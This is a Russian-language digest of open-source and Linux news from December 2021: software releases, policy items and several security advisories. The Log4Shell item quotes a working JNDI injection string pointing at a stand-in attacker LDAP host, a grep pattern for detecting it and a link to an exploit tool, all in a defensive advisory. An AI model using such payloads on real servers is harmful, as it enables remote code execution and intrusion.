Состоялся стабильный релиз протокола, механизма межпроцессного взаимодействия и библиотек Wayland 1.20. Ветка 1.20 обратно совместима на уровне API и ABI с выпусками 1.x и содержит в основном исправления ошибок и незначительные обновления протокола. Композитный сервер Weston, предоставляющий код и рабочие примеры для использования Wayland в десктоп-окружениях и встраиваемых решениях, развивается в рамках отдельного цикла разработки.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56320

Увидел свет релиз дистрибутива Kali Linux 2021.4, предназначенного для тестирования систем на предмет наличия уязвимостей, проведения аудита, анализа остаточной информации и выявления последствий атак злоумышленников. Все оригинальные наработки, созданные в рамках дистрибутива, распространяются под лицензией GPL и доступны через публичный Git-репозиторий. Для загрузки подготовлены несколько вариантов iso-образов, размером 466 МБ, 3.1 ГБ и 3.7 ГБ. Сборки доступны для архитектур i386, x86_64, ARM (armhf и armel, Raspberry Pi, Banana Pi, ARM Chromebook, Odroid). По умолчанию предлагается рабочий стол Xfce, но опционально поддерживаются KDE, GNOME, MATE, LXDE и Enlightenment e17.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56324

Европейская комиссия утвердила новые правила в отношении открытого программного обеспечения, в соответствии с которыми разработанные по заказу Еврокомиссии программные решения, представляющие потенциальную пользу для жителей, компаний и государственных учреждений, будут доступны всем желающим под открытыми лицензиями. Правила также упрощают перевод в разряд открытых уже существующих программных продуктов, принадлежащих Еврокомиссии, и уменьшают связанную с данным процессом бумажную волокиту.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56325

Опубликована критическая уязвимость CVE-2021-44228 в библиотеке Log4j языка Java. Библиотека разрабатывается с 2001 года в Арасhe Software Foundation и представляет собой фреймворк ведения логов. Уязвимость является крайне опасной ввиду следующих причин: Чрезвычайно широкое распростронение библиотеки в экосистеме Java Крайне простой эксплойт Возможность выполнения злоумышленником произвольной команды на сервере Возможность написания злоумышленником автоматических сканеров уязвимости в доступных из Интернет сервисах (тактика «spray and pray») Уязвимость работает путем передачи для записи в лог строки вида "${jndi:ldap://hackerownserver.com/resource}", при этом злоумышленник держит на hackerownserver.com сервер LDAP, специально настроенный для проведения атак вида «JNDI Injection», например JNDIExploit. Помимо схемы jndi:ldap: возможно использование jndi:rmi: и jndi:dns: Как бороться Уязвимыми следует считать Log4j версии 2.x. Версии 1.x уязвимы только при явном использовании JMSAppender. Проверить журнал приложения на предмет предпринятых атак можно при помощи egrep -i -r '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+' Для устранения уязвимости необходимо как можно скорее обновить Log4j до версии 2.15.0. Кроме того, если обновление невозможно в силу тех или иных причин, то обезопасить приложение можно путем установки системной переменной Java log4j2.formatMsgNoLookups в значение true (для Log4j 2.10+), или путем удаления класса JndiLookup из classpath. Ссылки Официальная страница Log4j: [ https://logging.apache.org/log4j/2.x/ ]( https://logging.apache.org/log4j/2.x/ ) Log4j RCE Exploitation Detection: [ https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b ]( https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b ) JNDIExploit: [ https://github.com/feihong-cs/JNDIExploit ]( https://github.com/feihong-cs/JNDIExploit ) Как работает JNDI Injection: [ https://www.veracode.com/blog/research/exploiting-jndi-injections-java ]( https://www.veracode.com/blog/research/exploiting-jndi-injections-java )
Ссылка: https://www.linux.org.ru/news/security/16685022

В открытой платформе визуализации данных Grafana выявлена уязвимость (CVE-2021-43798), позволяющая выйти за пределы базового каталога и получить доступ к произвольным файлам в локальной файловой системе сервера, насколько это позволяют права доступа пользователя, под которым выполняется Grafana. Проблема вызвана некорректной работой обработчика пути "/public/plugins/‹plugin-id›/", в котором допускалось использование символов ".." для доступа к нижележащим каталогам.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56329

Началось тестирование первого кандидата в релизы Wine 7.0, открытой реализации WinAPI. Кодовая база переведена на стадию заморозки перед релизом, который ожидается в середине января. По сравнению с выпуском Wine 6.23 закрыто 32 отчёта об ошибках и внесено 211 изменений.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56327

Состоялся релиз Kali Linux 2021.4 (последний выпуск в 2021 году) — дистрибутива для [ оценки безопасности компьютерных систем или сетей средствами моделирования атаки злоумышленника ]( https://ru.wikipedia.org/wiki/Испытание_на_проникновение ) (penetration testing). Kali Linux предназначен для профессионалов и не рекомендуется к использованию в качестве ОС общего назначения! ( [ читать дальше... ]( https://www.linux.org.ru/news/linux-general/16685249#cut ) )
Ссылка: https://www.linux.org.ru/news/linux-general/16685249

Опубликован выпуск инструментария Ventoy 1.0.62, предназначенного для создания загрузочных USB-носителей, включающих несколько операционных систем. Программа примечательна тем, что обеспечивает возможность загрузки ОС из неизменных ISO, WIM, IMG, VHD и EFI-образов, не требуя распаковки образа или переформатирования носителя. Например, достаточно просто скопировать на USB Flash с загрузчиком Ventoy интересующий набор iso-образов и Ventoy обеспечит возможность загрузки находящихся внутри операционных систем. В любой момент можно заменить или добавить новые iso-образы просто скопировав новые файлы, что удобно для тестирования и предварительного ознакомления с различными дистрибутивами и операционными системами. Код проекта написан на языке Си и распространяется под лицензией GPLv3.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56328

Представлено декабрьское сводное обновление приложений (21.12), развиваемых проектом KDE. Напомним, что сводный набор приложений KDE c апреля публикуется под именем KDE Gear, вместо KDE Apps и KDE Applications. Всего в рамках обновления опубликованы выпуски 230 программ, библиотек и плагинов. Информацию о наличии Live-сборок с новыми выпусками приложений можно получить на данной странице.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56330

Представлен выпуск проекта GitBucket 4.37, развивающего систему для совместной работы с Git-репозиториями с интерфейсом в стиле GitHub и Bitbucket. Система отличается простотой установки, возможностью расширения функциональности через плагины и совместимостью с API GitHub. Код написан на языке Scala и доступен под лицензией Apache 2.0. В качестве СУБД могут использоваться MySQL и PostgreSQL.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56332

Опубликован третий выпуск стартовых наборов на Десятой платформе ALT. Преложенные образы подходят для начала работы со стабильным репозиторием тем опытным пользователям, которые предпочитают самостоятельно определять список пакетов приложений и настраивать систему (вплоть до создания собственных производных). Как составные произведения они распространяются на условиях лицензии GPLv2+. Варианты включают в себя базовую систему и одно из окружений рабочего стола или набор специализированных приложений.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56334

Опубликован выпуск Unix-подобной операционной системы ToaruOS 2.0, написанной с нуля и поставляемой со своим ядром, загрузчиком, стандартной Си-библиотекой, пакетным менеджером, компонентами пространства пользователя и графическим интерфейсом с композитным оконным менеджером. Код проекта написан на языке Си и распространяется под лицензией BSD. Для загрузки подготовлен live-образ, размером 14.4 МБ, который можно протестировать в QEMU, VMware или VirtualBox.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56333

Компания Intel передала гипервизор Cloud Hypervisor, оптимизированный для применения в облачных системах, под покровительство организации Linux Foundation, инфраструктура и сервисы которой будут использованы в дальнейшей разработке. Переход под крыло Linux Foundation избавит проект от зависимости от отдельной коммерческой компании и упростит совместную работу с привлечением сторонних участников. О своей поддержке проекта уже объявили такие компании, как Alibaba, ARM, ByteDance и Microsoft, представители которых, наряду с разработчиками из Intel, образовали курирующий проект совет.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56335

В каталоге PyPI (Python Package Index) выявлены три библиотеки, содержащие вредоносный код. До выявления проблем и удаления из каталога в сумме пакеты успели загрузить почти 15 тысяч раз.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56337

Компания Google опубликовала релиз языка программирования Dart 2.15, продолживший развитие кардинально переработанной ветки Dart 2, которая отличается от изначального варианта языка Dart применением сильной статической типизации (типы могут выводиться автоматически, поэтому указание типов не является обязательным, но динамическая типизация больше не используется и вычисленный изначально тип закрепляется за переменной и в дальнейшем применяется строгая проверка типа).
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56336

Компания Google сформировала обновление Chrome 96.0.4664.110, в котором исправлены 5 уязвимостей, в том числе уязвимость (CVE-2021-4102), уже применяемая злоумышленниками в эксплоитах (0-day) и критическая уязвимость (CVE-2021-4098), позволяющая обойти все уровни защиты браузера и выполнить код в системе за пределами sandbox-окружения.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56340

Компания Coinbase, поддерживающая одноимённую платформу обмена цифровых валют, объявила об открытии исходных текстов криптографической библиотеки Kryptology, предлагающей набор криптографических алгоритмов для применения в распределённых системах, в которых шифрование и подтверждение подлинности осуществляется с привлечением нескольких участников. Код написан на языке Go и распространяется под лицензией Apache 2.0.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56341

Организация Apache Software Foundation опубликовала сводный отчёт о проектах, которые затрагивает критическая уязвимость в Log4j 2, позволяющая выполнить произвольный код на сервере. Проблеме подвержены следующие проекты Apache: Archiva, Druid, EventMesh, Flink, Fortress, Geode, Hive, JMeter, Jena, JSPWiki, OFBiz, Ozone, SkyWalking, Solr, Struts, TrafficControl и Calcite Avatica. Уязвимость также затронула продукты GitHub, включая GitHub.com, GitHub Enterprise Cloud и GitHub Enterprise Server.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56342

Проект ЯОС развивает ответвление от операционной системы A2, также известной как Bluebottle и Active Oberon. Одна из основных целей проекта - кардинальное внедрение русского языка во всю систему, включая (хотя бы частичный) перевод исходных текстов на русский язык. ЯОС может работать как приложение в окне под Linux или Windows, а также в виде обособленной операционной системы на оборудовании x86 и ARM (поддерживаются платы Zybo Z7-10 и Raspberry Pi 2). Код написан на языке Active Oberon и распространяется под лицензией BSD.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56339

В X.Org Server выявлены четыре уязвимости, позволяющие поднять свои привилегии в системе, если X-сервер выполняется с правами root, или выполнить код на удалённой системе, если для доступа используется перенаправление сеанса X11 при помощи SSH. Проблемы обещают устранить в выпуске xorg-server 21.1.2, который ожидается в ближайшие дни. В дистрибутивах проблемы пока остаются неисправленными (Debian, Ubuntu, RHEL, SUSE, Fedora, Arch).
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56344

Состоялся выпуск децентрализованной платформы для организации видеохостинга и видеовещания PeerTube 4.0. PeerTube предлагает независимую от отдельных поставщиков альтернативу YouTube, Dailymotion и Vimeo, использующую сеть распространения контента на базе P2P-коммуникаций и связывания между собой браузеров посетителей. Наработки проекта распространяются под лицензией AGPLv3.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56338

В реализации подстановок JNDI в библиотеке Log4j 2 выявлена ещё одна уязвимость (CVE-2021-45046), проявляющаяся несмотря на добавленные в выпуск 2.15 исправления и независимо от использования настройки "log4j2.noFormatMsgLookup" для защиты. Проблема представляет опасность в основном для старых версий Log4j 2, защищённых при помощи флага "noFormatMsgLookup", так как даёт возможность обойти защиту от прошлой узявимости (Log4Shell, CVE-2021-44228), позволяющей выполнить свой код на сервере. Для пользователей версии 2.15 эксплуатация ограничивается созданием условий для аварийного завершения приложения из-за исчерпания доступных ресурсов.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56347

Представлен релиз проекта QEMU 6.2. В качестве эмулятора QEMU позволяет запустить программу, собранную для одной аппаратной платформы, на системе с совершенно иной архитектурой, например, выполнить приложение для ARM на x86-совместимом ПК. В режиме виртуализации в QEMU производительность выполнения кода в изолированном окружении близка к аппаратной системе за счёт прямого выполнения инструкций на CPU и задействования гипервизора Xen или модуля KVM.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56349

Компания System76, специализирующаяся на производстве ноутбуков, ПК и серверов, поставляемых с Linux, опубликовала выпуск дистрибутива Pop!_OS 21.10. Pop!_OS основан на пакетной базе Ubuntu 21.10 и поставляется с собственным окружением рабочего стола COSMIC. Наработки проекта распространяются под лицензией GPLv3. ISO-образы сформированы для архитектуры x86_64 и ARM64 в вариантах для графических чипов NVIDIA (2.9 ГБ) и Intel/AMD (2.5 ГБ), а также для плат.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56350

В Toxcore, эталонной реализации P2P-протокола обмена сообщениями Tox, выявлена уязвимость (CVE-2021-44847), которая потенциально позволяет инициировать выполнение кода при обработке специально оформленного UDP-пакета. Уязвимости подвержены все пользователи приложений на базе Toxcore, в которых не отключён транспорт UDP. Для атаки достаточно отправить UDP-пакет, зная IP-адрес, сетевой порт и открытый DHT-ключ жертвы (данные сведения доступны публично в DHT, т.е. атака могла быть совершена на любого пользователя или узел DHT).
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56354

Доступны корректирующие выпуски криптографической библиотеки OpenSSL 3.0.1 и 1.1.1m. В версии 3.0.1 устранена уязвимость (CVE-2021-4044), также в обоих выпусках исправлено около десятка ошибок.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56352

Состоялся релиз консольного текстового редактора GNU nano 6.0, предлагаемого в качестве редактора по умолчанию во многих пользовательских дистрибутивах, разработчики которых считают vim слишком сложным для освоения.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56353

Rui Ueyama, автор компоновщика LLVM lld и компилятора chibicc, представил первый стабильный релиз нового высокопроизводительного компоновщика Mold, заметно опережающего по скорости связывания объектных файлов компоновщики GNU gold и LLVM lld. Проект признан готовым для рабочих внедрений и может применяться в качестве более быстрой прозрачной замены GNU linker на Linux-системах. Из планов на следующий значительный выпуск отмечается доведение до готовности поддержки платформы macOS, после чего начнётся работа по адаптации Mold для Windows.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56358

Майкл Свит (Michael R Sweet), автор системы печати CUPS, представил выпуск PAPPL 1.1, фреймворка для разработки приложений для печати на базе протокола IPP Everywhere, которые рекомендуется использовать вместо традиционных драйверов для принтеров. Код фреймворка написан на языке Си и распространяется под лицензией Apache 2.0 с исключением, разрешающим связывание с кодом под лицензиями GPLv2 и LGPLv2.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56359

В USB Gadget, подсистеме ядра Linux, предоставляющей программный интерфейс для создания клиентских USB-устройств и программной симуляции USB-устройств, выявлена уязвимость (CVE-2021-39685), которая может привести к утечке информации из ядра, краху или выполнению произвольного кода на уровне ядра. Атака производится непривилегированным локальным пользователем через манипуляции с различными классами устройств, реализованными на базе API USB Gadget, такими, как rndis, hid, uac1, uac1_legacy и uac2.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56357

Как сообщает российский разработчик операционных систем «Альт», в Красноярском крае успешно завершился очередной этап перевода государственных цифровых ресурсов на операционные системы «Альт». Итогом проведённой работы является запуск Государственной информационной системы «Енисей-СЭД», обеспечивающей документооборот в органах исполнительной власти и гос.учреждениях края и города. Согласно планам, в очереди на следующей миграции находится региональная система межведомственного электронного взаимодействия «Енисей-ГУ».Генеральный директор «Базальт СПО» Сергей Трандин: Задачи цифровой трансформации должны решаться в неразрывной связи с задачами обеспечения информационной безопасности. Именно такой подход практикует Министерство цифрового развития Красноярского края, осуществляя проект перевода цифровых ресурсов на российские операционные системы с высоким уровнем защиты. Важно отметить, что ИТ-специалисты министерства заранее позаботились об обеспечении совместимости региональных госинформсистем с ОС «Альт». Таким образом, они не только обеспечили технологическую независимость подведомственной им ИТ-инфраструктуры, но и открыли возможность использовать российские ОС всем организациям и физическим лицам без искусственных ограничений каналов взаимодействия с государством.
Ссылка: https://www.linux.org.ru/news/russia/16693133

Подготовлен выпуск OpenVPN 2.5.5, пакета для создания виртуальных частных сетей, позволяющего организовать шифрованное соединение между двумя клиентскими машинами или обеспечить работу централизованного VPN-сервера для одновременной работы нескольких клиентов. Код OpenVPN распространяется под лицензией GPLv2, готовые бинарные пакеты формируются для Debian, Ubuntu, CentOS, RHEL и Windows.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56356

Доступен корректирующий выпуск Firefox 95.0.1, в котором устранено несколько ошибок.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56360

Компания «Базальт СПО» выпустила новые версии российских операционных систем: «Альт Рабочая станция» 10.0; «Альт Сервер» 10.0; «Альт Образование» 10.0. Теперь они развиваются на основе десятой платформы (p10 Aronia) –– ветке репозитория свободных программ «Сизиф» (Sisyphus). Особое внимание разработчики уделили решениям, которые помогают организациям бесшовно интегрировать унаследованную инфраструктуру, построенную на зарубежном ПО, с инфраструктурой под управлением отечественных ОС, в том числе, обеспечить поддержку Microsoft Active Directory (и с серверной и с клиентской стороны) и единые групповые политики. ( [ читать дальше... ]( https://www.linux.org.ru/news/russia/16693953#cut ) )
Ссылка: https://www.linux.org.ru/news/russia/16693953

Проект KDE представил выпуск GCompris 2.0, свободного обучающего центра для детей дошкольного и младшего школьного возраста. Пакет предоставляет более 170 мини-уроков и модулей, включающих от простейшего графического редактора, головоломок и клавиатурного тренажера до уроков математики, географии и обучения чтению. GCompris использует библиотеку Qt и развивается сообществом KDE. Готовые сборки сформированы для Linux, macOS, Windows, Raspberry Pi и Android.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56365

Сбербанком было проведено серверное тестирование на процессорах «Эльбрус». Итогом стала констатация того, что в данный момент предоставленное МЦСТ оборудование технически не соответствует запросам и ожиданиям корпорации.Представитель лаборатории новых технологических решений Сбербанка Антон Жбанков дал следующие комментарии: «Технические выводы достаточно простые: очень слабо для сравнения с Intel Xeon — мало памяти, медленная память, мало ядер, мало частоты. Функциональные требования катастрофически не выполнены».Сбербанк проводил изучение серверов по различным методикам. Приведенные критические оценки в первую очередь относятся к итогам функционального тестирования по методике Sberinfra на соответствие корпоративным эксплуатационным требованиям банка.В результате тестирования, как отметил Жбанков, «чуда не произошло» — серверы показали соответствие 7 из 44 параметров («наличие лапки кабель-менеджмента, наличие рельсов, наличие индикации каждого элемента, наличие удаленного управления» и пр.) — 16%.Изделия на российских чипах уступили зарубежному конкуренту по всем параметрам, однако полученные результаты сотрудников Сбербанка все же «неожиданно и очень приятно» удивили. «Мы ожидали, что разница будет не в разы, а в 20-30 раз, — отмечает Жбанков. — Для нас это реально удивительно». Вторым фактором удивления для тестировщиков стал вывод о том, что перед ними оказался законченный продукт.Фрагмент с выступлением руководителя лаборатории новых технологических решений «Сбера» Антона Жбанкова на партнерской конференции АО «МЦСТ» по поводу проведения этого тестирования доступен [ по данной ссылке ]( https://www.youtube.com/watch?v=9OpcC7YjLTU&t=8084s/ ) (таймкод уже применён: 2:14:44).Из комментариев МЦСТ: «Для цели тестирования Сбербанком было разработано и передано макетное приложение. Для этого макетного приложения за счет доработки Java-машины и подбора опций улучшили среднее время отклика на процессоре “Эльбрус-8С” с исходных 24 мс до 4 мс (в шесть раз), при этом на X86 (Соге i7-9700 CPU 3 GHz) оно получилось 3 мс».8-ядерный российский процессор «Эльбрус-8С» на архитектуре E2K выпускает АО «МЦСТ». У данного производителя есть и другие более современные процессоры — «Эльбрус-8СВ» и «Эльбрус-16С», который еще не вышел на рынок. В планах компании выпустить «Эльбрус-32С». Планируется, что «Эльбрус-32С» будет создан по технологии 7 нм, а первые рабочие образцы российского 32-ядерного процессора появятся в 2025 году.
Ссылка: https://www.linux.org.ru/news/hardware/16694634

Mold (a modern linker) – новый высокоскоростной [ компоновщик ]( https://github.com/rui314/mold/blob/main/README.md ) для Unix-like платформ (i386 и x86-64). В [ бенчмарках ]( https://github.com/rui314/mold/blob/main/docs/comparison.png ) он в разы быстрее чем LLVM lld, и на порядок быстрее чем GNU gold, будучи при этом совместим с ними. Проект написан на C++20 автором, ранее создавшим LLVM lld. Лицензия – GNU AGPL v3. Автор [ заявляет ]( https://github.com/rui314/mold/blob/main/LICENSE ) о поиске спонсора, который перелицензирует проект под более пермиссивной лицензией. В качестве мотивации появления проекта называется нежелание тратить длительное время на перекомпоновку больших бинарников в процессе разработки. Mold намного быстрее конкурентов, потому что использует более быстрые алгоритмы, эффективные структуры данных и интенсивное распараллеливание.
Ссылка: https://www.linux.org.ru/news/development/16695497

После полутора лет разработки представлен релиз операционной системы ReactOS 0.4.14, нацеленной на обеспечение совместимости с программами и драйверами Microsoft Windows. Операционная система находится на "альфа"-стадии разработки. Для загрузки подготовлены установочный ISO-образ (115 МБ) и Live-сборка (в zip-архиве 85 МБ). Код проекта распространяется под лицензиями GPLv2 и LGPLv2.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56361

Опубликован выпуск проекта Chrony 4.2, предоставляющего независимую реализацию клиента и сервера NTP, применяемую для синхронизации точного времени в различных дистрибутивах Linux, в том числе в Fedora, Ubuntu, SUSE/openSUSE и RHEL/CentOS. Программа поддерживает спецификацию NTPv4 (RFC 5905) и протокол NTS (Network Time Security), использующий элементы инфраструктуры открытых ключей (PKI) и позволяющий применять TLS и аутентифицированное шифрование AEAD (Authenticated Encryption with Associated Data) для криптографической защиты синхронизации времени. Код написан на языке Си и распространяется под лицензией GPLv2.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56363

Фонд свободного ПО утвердил два документа, регламентирующих обязанности и поведение участников совета директоров, а также задающих новый стандарт управления организацией. Каждый член совета директоров будет обязан подписать документ "Board Member Agreement", определяющий список обязанностей и правил работы. Второй документ "Board of Directors Code of Ethics" задаёт общие этические правила поведения, которым должны следовать участники совета директоров. В начале следующего года с учётом представленных документов планируется пересмотреть состав текущих участников совета директоров и начать привлечение новых лиц к управлению организацией.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56362

После шести месяцев разработки опубликован выпуск утилиты youtube-dl 2021.12.17, предоставляющей интерфейс командной строки для загрузки звука и видео из YouTube и многих других сайтов и online-сервисов, включая VK, YandexVideo, RUTV, Rutube, PeerTube, Vimeo, Instagram, Twitter и Steam. Код проекта написан на языке Python и распространяется в форме общественного достояния.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56366

В состав пакетной базы Debian testing, на основе которой будет сформирован релиз Debian 12 "Bookworm", принят пакет fnt с реализацией менеджера шрифтов, решающего задачу установки дополнительных шрифтов и поддержания уже имеющихся шрифтов в актуальном состоянии. Кроме Linux программа также может использоваться во FreeBSD (на днях добавлен порт) и macOS. Код написан на Shell и распространяется под лицензией MIT.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56369

Российская компания Syntacore (входит в группу Yadro) впервые вошла в состав правления глобального консорциума RISC-V International.Организация занимается развитием и продвижением открытой процессорной архитектуры RISC-V. Помимо отечественной компании, в совет директоров ассоциации входят представители Google, Alibaba Group и Huawei. Члены правления определяют технические инициативы и долгосрочную стратегию ассоциации.
Ссылка: https://www.linux.org.ru/news/hardware/16695342

В применяемую в Ubuntu тему оформления Yaru принято изменение, в котором для всех элементов кнопок, ползунков, виджетов и переключателей вместо баклажанового цвета задействован оранжевый цвет. Аналогичная замена выполнена в наборе пиктограмм. Цвет кнопки закрытия активного окна изменён с оранжевого на серый, а цвет ручек ползунков с светло-серого на белый. Если изменение не будет отменено, обновлённая цветовая схема будет предложена в выпуске Ubuntu 22.04.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56372

Опубликовано второе корректирующее обновление дистрибутива Debian 11, в которое включены накопившиеся обновления пакетов и устранены недоработки в инсталляторе. Выпуск включает 64 обновления с устранением проблем со стабильностью и 30 обновлений с устранением уязвимостей.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56373

В результате декомпиляции приложения TikTok Live Studio, на днях предложенного для тестирования видеохостигом TikTok, выявлены факты заимствования кода свободного проекта OBS Studio без выполнения требований лицензии GPLv2, предписывающих распространять на тех же условиях производные проекты. Компания TikTok не выполнила данные условия и начала распространение тестовой версии только в форме готовых сборок, не предоставив доступ к исходным текстам своего ответвления от OBS. В настоящее время страница для загрузки TikTok Live Studio уже удалена с сайта TikTok, но прямые ссылки для загрузки пока работают.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56368

В библиотеке Log4j 2 выявлена ещё одна уязвимость (CVE-2021-45105), которая в отличие от двух прошлых проблем, отнесена к категории опасных, но не критических. Новая проблема позволяет вызвать отказ в обслуживании и проявляется в виде зацикливания и аварийного завершения при обработке определённых строк. Уязвимость устранена в опубликованном несколько часов назад выпуске Log4j 2.17. Опасность уязвимости сглаживает то, что проблема проявляется только на системах с Java 8.
Ссылка: https://www.opennet.ru/opennews/art.shtml?num=56370

PeerTube — свободная (AGPL 3.0) реализация видеохостинга, использующего технологии AcivityPub (протокол федеративных сетей) и WebTorrent (p2p на основе WebRTC), благодаря чему можно не иметь крупную серверную инфраструктуру для доставки контента. Реализована возможность создавать каналы, загружать на них видео и вести трансляции, подписываться на новые видео, писать комментарии и совершать прочие действия, используя единый аккаунт внутри сети. ( [ читать дальше... ]( https://www.linux.org.ru/news/opensource/16696346#cut ) ) С полным списком изменений можно ознакомиться на [ странице релиза в GitHub ]( https://github.com/Chocobozzz/PeerTube/releases/tag/v4.0.0 ) . >>> [ JoinPeerTube ]( https://joinpeertube.org/ ) (официальный сайт)
Ссылка: https://www.linux.org.ru/news/opensource/16696346

В тему оформления Yaru принято изменение, в котором для всех элементов кнопок, ползунков, виджетов и переключателей отказались от баклажанового цвета и вернулись к оранжевому. Причиной такого решения стали ограничения библиотеки libadwaita, в которую начиная с GTK 4.4 вынесены компоненты используемой в GNOME темы оформления Adwaita. В этом релизе нельзя использовать более одного акцентирующего цвета, и применяется серый цвет для кнопки закрытия окна для того, чтобы добиться единообразия элементов заголовка.Напомним, что первым сокращением масштаба работы над темой оформления Ubuntu стал отказ от разработки тем Ambiance и Radiance и переход на Yaru в [ релизе Ubuntu 18.10. ]( https://blog.ubuntu.com/2018/05/18/desktop-plans-for-18-10 ) Целью данного перехода было упрощение разработки темы и сокращение слишком больших трудозатрат на сопровождение нестандартных тем оформления, путем использования стандартного стиля, что в итоге привело и к «пластиковому» интерфейсу в дальнейшем. [ Далее в Ubuntu 21.10 отказались от комбинированного варианта сочетающего тёмные заголовки, светлый фон и светлые элементы управления ]( https://www.omgubuntu.co.uk/2021/06/ubuntu-21-10-yarn-theme-change ) , так как отсутствует в последних релизах GTK3 и GTK4 возможности определения разных цветов фона и текста для заголовка и основного окна, что не позволяет гарантировать корректную работу всех GTK-приложений при использовании комбинированных тем.
Ссылка: https://www.linux.org.ru/news/ubuntu/16697571

Ampache — сервер для хранения аудио/видео коллекции и потокового вещания. Сервер поддерживает [ множество клиентов ]( https://github.com/ampache/ampache/wiki/Clients ) , также имеет веб-интерфейс для прослушивания. ( [ читать дальше... ]( https://www.linux.org.ru/news/multimedia/16698474#cut ) ) [ Сайт проекта ]( https://ampache.org/ ) Программа написана на PHP и распространяется под свободной лицензией AGPLv3.
Ссылка: https://www.linux.org.ru/news/multimedia/16698474